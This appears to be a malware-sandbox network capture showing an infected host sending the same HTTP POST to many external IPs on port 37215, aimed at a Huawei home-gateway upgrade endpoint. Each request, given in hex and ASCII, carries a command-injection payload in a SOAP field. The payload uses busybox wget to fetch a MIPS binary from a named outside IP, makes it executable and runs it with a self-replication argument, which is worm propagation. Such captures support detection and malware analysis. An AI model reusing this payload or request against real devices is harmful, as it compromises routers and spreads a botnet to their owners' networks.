                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1345192.168.2.1343476197.43.139.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558175087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1346192.168.2.1335354157.58.23.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558202982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1347192.168.2.1351938197.29.48.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558243036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1348192.168.2.1353250190.248.18.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558257103 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1349192.168.2.1335554157.50.9.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558276892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1350192.168.2.134664441.110.102.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558527946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1351192.168.2.1347760197.220.117.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558530092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1352192.168.2.1351032197.20.15.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558548927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1353192.168.2.133413491.237.123.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558590889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1354192.168.2.135109041.49.105.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.558604956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 